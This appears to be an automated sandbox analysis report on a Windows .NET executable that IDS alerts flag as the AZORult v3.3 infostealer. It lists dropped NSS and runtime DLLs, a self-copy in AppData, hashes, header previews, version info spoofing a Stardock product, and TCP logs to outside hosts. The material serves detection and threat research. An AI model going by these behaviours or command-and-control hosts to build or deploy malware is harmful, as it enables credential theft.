                                                                    SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                    MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                    SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                    SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                    SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\nss3.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1244112
                                                                    Entropy (8bit):6.809431682312062
                                                                    Encrypted:false
                                                                    SSDEEP:24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn
                                                                    MD5:556EA09421A0F74D31C4C0A89A70DC23
                                                                    SHA1:F739BA9B548EE64B13EB434A3130406D23F836E3
                                                                    SHA-256:F0E6210D4A0D48C7908D8D1C270449C91EB4523E312A61256833BFEAF699ABFB
                                                                    SHA-512:2481FC80DFFA8922569552C3C3EBAEF8D0341B80427447A14B291EC39EA62AB9C05A75E85EEF5EA7F857488CAB1463C18586F9B076E2958C5A314E459045EDE2
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........x..c+..c+..c+...+..c++.b*..c+lh.+..c++.`*..c++.f*..c++.g*..c+.b*..c+9.b*..c+..b+..c+9.k*..c+9.g*C.c+9.c*..c+9..+..c+9.a*..c+Rich..c+................PE..L...a..Z.........."!................T........................................@............@.............................d....<..T.......h.......................t~..0...T...............................@............................................text............................... ..`.rdata...P.......R..................@..@.data....E...`... ...:..............@....rsrc...h............Z..............@..@.reloc..t~...........^..............@..B................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\nssdbm3.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):92624
                                                                    Entropy (8bit):6.639368309935547
                                                                    Encrypted:false
                                                                    SSDEEP:1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw
                                                                    MD5:569A7A65658A46F9412BDFA04F86E2B2
                                                                    SHA1:44CC0038E891AE73C43B61A71A46C97F98B1030D
                                                                    SHA-256:541A293C450E609810279F121A5E9DFA4E924D52E8B0C6C543512B5026EFE7EC
                                                                    SHA-512:C027B9D06C627026774195D3EAB72BD245EBBF5521CB769A4205E989B07CB4687993A47061FF6343E6EC1C059C3EC19664B52ED3A1100E6A78CFFB1C46472AFB
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Z.Y.4.Y.4.Y.4.P...U.4...5.[.4..y.Q.4...7.X.4...1.S.4...0.R.4.{.5.[.4...5.Z.4.Y.5...4...0.A.4...4.X.4....X.4...6.X.4.RichY.4.........................PE..L......Z.........."!.........0...............0............................................@..........................?.......@.......`..p............L.......p.......:..T...........................(;..@............0..X............................text............................... ..`.rdata..4....0... ..................@..@.data........P.......>..............@....rsrc...p....`.......@..............@..@.reloc.......p.......D..............@..B................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\softokn3.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):144336
                                                                    Entropy (8bit):6.5527585854849395
                                                                    Encrypted:false
                                                                    SSDEEP:3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv
                                                                    MD5:67827DB2380B5848166A411BAE9F0632
                                                                    SHA1:F68F1096C5A3F7B90824AA0F7B9DA372228363FF
                                                                    SHA-256:9A7F11C212D61856DFC494DE111911B7A6D9D5E9795B0B70BBBC998896F068AE
                                                                    SHA-512:910E15FD39B48CD13427526FDB702135A7164E1748A7EACCD6716BCB64B978FE333AC26FA8EBA73ED33BD32F2330D5C343FCD3F0FE2FFD7DF54DB89052DB7148
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L......Z.........."!.........`...............................................P......+Z....@..........................................0..p....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...C.......D..................@..@.data........ ......................@....rsrc...p....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\ucrtbase.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1142072
                                                                    Entropy (8bit):6.809041027525523
                                                                    Encrypted:false
                                                                    SSDEEP:24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
                                                                    MD5:D6326267AE77655F312D2287903DB4D3
                                                                    SHA1:1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
                                                                    SHA-256:0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
                                                                    SHA-512:11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\F0C19552\vcruntime140.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):83784
                                                                    Entropy (8bit):6.890347360270656
                                                                    Encrypted:false
                                                                    SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                    MD5:7587BF9CB4147022CD5681B015183046
                                                                    SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                    SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                    SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):4.954046985613375
                                                                    Encrypted:false
                                                                    SSDEEP:1536:B/fgVgb2KTbpyRAclDWz98JfkT7M9Q5UyB:JgSbJbwScsqJMj
                                                                    MD5:8620EEAF925B0C5943C5B0A217797A32
                                                                    SHA1:A5D8E44B1FFC4AB251026C5381559884901593D0
                                                                    SHA-256:567BC9BBF28D175408E7CF8055066CD723F71E3A23BEEFE06038F3EB4795C1DA
                                                                    SHA-512:A919376BE6FEB5EA6653FA6B04EC1B6EFF9BFF5E9E0E2A7CD2D327730D330302091328F555263D6237CFC7AC4A5B098B12FE20476F929560236A9A9E6D1F960D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K_................0..8...........V... ...`....@.. .......................`............@..................................U..K....`.......................@....................................................... ............... ..H............text...46... ...8.................. ..`.rsrc........`.......:..............@..@.reloc.......@......................@..B.................V......H........0...$..........$U...............................................0..6........(.........(.....(....(....o.....(.....(.......8.....*..".(.....*..........(....r...p......%......(.....(...........%..P.o....&*.0...........s....%r...po.....%r...po.....%.o......8.....*..".(.....*....0..T......... ....(...........&.......r5..p(....o....o....s.... .^[.o.......(.....(.....o....&*................".(.....*....0............(....o.......8..........o........8t...........o....r}..p(.

                                                                    C:\Users\user\AppData\Roaming\Lrqwbyq\Pthmzffh.exe:Zone.Identifier

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\6CJfScEKhr.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:[ZoneTransfer]....ZoneId=0

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Entropy (8bit):4.954046985613375
                                                                    TrID:
                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                    File name:6CJfScEKhr.exe
                                                                    File size:196608
                                                                    MD5:8620eeaf925b0c5943c5b0a217797a32
                                                                    SHA1:a5d8e44b1ffc4ab251026c5381559884901593d0
                                                                    SHA256:567bc9bbf28d175408e7cf8055066cd723f71e3a23beefe06038f3eb4795c1da
                                                                    SHA512:a919376be6feb5ea6653fa6b04ec1b6eff9bff5e9e0e2a7cd2d327730d330302091328f555263d6237cfc7ac4a5b098b12fe20476f929560236a9a9e6d1f960d
                                                                    SSDEEP:1536:B/fgVgb2KTbpyRAclDWz98JfkT7M9Q5UyB:JgSbJbwScsqJMj
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K_................0..8...........V... ...`....@.. .......................`............@................................

                                                                    File Icon

                                                                    Icon Hash:4c924c6c544cb344

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x40562e
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x99145F4B [Sun May 21 02:32:43 2051 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:v4.0.30319
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    jmp dword ptr [00402000h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x55e00x4b.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x2c280.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x340000xc.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x20000x36340x3800False0.56103515625data5.90339665344IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x60000x2c2800x2c400False0.14360434322data4.71786779415IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x340000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountry
                                                                    RT_ICON0x62800x528GLS_BINARY_LSB_FIRST
                                                                    RT_ICON0x67a80xb68data
                                                                    RT_ICON0x73100x1428dBase IV DBT of @.DBF, block length 5120, next free block index 40, next free block 0, next used block 0
                                                                    RT_ICON0x87380x2d28data
                                                                    RT_ICON0xb4600x5028dBase IV DBT of \200.DBF, blocks size 0, block length 20480, next free block index 40, next free block 0, next used block 0
                                                                    RT_ICON0x104880xb428data
                                                                    RT_ICON0x1b8b00x14028dBase IV DBT, blocks size 0, block length 16384, next free block index 40, next free block 16777215, next used block 16777215
                                                                    RT_ICON0x2f8d80x23a4PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                    RT_GROUP_ICON0x31c7c0x76data
                                                                    RT_VERSION0x31cf40x39edata
                                                                    RT_MANIFEST0x320940x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                    Imports

                                                                    DLLImport
                                                                    mscoree.dll_CorExeMain

                                                                    Version Infos

                                                                    DescriptionData
                                                                    Translation0x0000 0x04b0
                                                                    LegalCopyrightCopyright 2008-2017 Stardock Corporation
                                                                    Assembly Version3.0.9.11
                                                                    InternalNameSngggz.exe
                                                                    FileVersion3.0.9.11
                                                                    CompanyNameStardock Corporation
                                                                    LegalTrademarks
                                                                    CommentsFences Settings
                                                                    ProductNameFences
                                                                    ProductVersion3.0.9.11
                                                                    FileDescriptionFences Settings
                                                                    OriginalFilenameSngggz.exe

                                                                    Network Behavior

                                                                    Snort IDS Alerts

                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                    02/26/22-10:19:50.294819TCP2029467ET TROJAN Win32/AZORult V3.3 Client Checkin M144977780192.168.2.580.66.64.174
                                                                    02/26/22-10:19:51.116980TCP2029138ET TROJAN AZORult v3.3 Server Response M3804977780.66.64.174192.168.2.5

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Feb 26, 2022 10:18:55.469547987 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.486524105 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.494899988 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.495990992 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.512356043 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529630899 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529661894 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529680967 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529701948 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529722929 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529743910 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529763937 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529781103 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529798031 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529813051 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529836893 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529894114 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529916048 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529936075 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529954910 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529973984 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.529994965 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530015945 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530036926 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530056000 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530076027 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530095100 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530116081 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530131102 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530148029 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530163050 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530178070 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530198097 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530213118 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530226946 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530241966 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530257940 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530272007 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530291080 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530311108 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530328989 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530349016 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530368090 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530385971 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530404091 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530422926 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530442953 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530462027 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530479908 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530499935 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530519009 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530539036 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.530558109 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.544389963 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.547821999 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.548425913 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.548454046 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.548491955 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.548654079 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.562098026 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.562165976 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.562205076 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.562244892 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.562280893 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.563433886 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.564589977 CET4974180192.168.2.5104.21.89.250
                                                                    Feb 26, 2022 10:18:55.565433979 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565476894 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565515041 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565551996 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565591097 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565628052 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565668106 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565706015 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565743923 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.565783024 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566159964 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566184044 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566230059 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566268921 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566307068 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566346884 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566385031 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566423893 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566458941 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566494942 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566534042 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566570997 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566608906 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566647053 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566684961 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566724062 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566764116 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566800117 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566837072 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566876888 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566915035 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566952944 CET8049741104.21.89.250192.168.2.5
                                                                    Feb 26, 2022 10:18:55.566991091 CET8049741104.21.89.250192.168.2.5
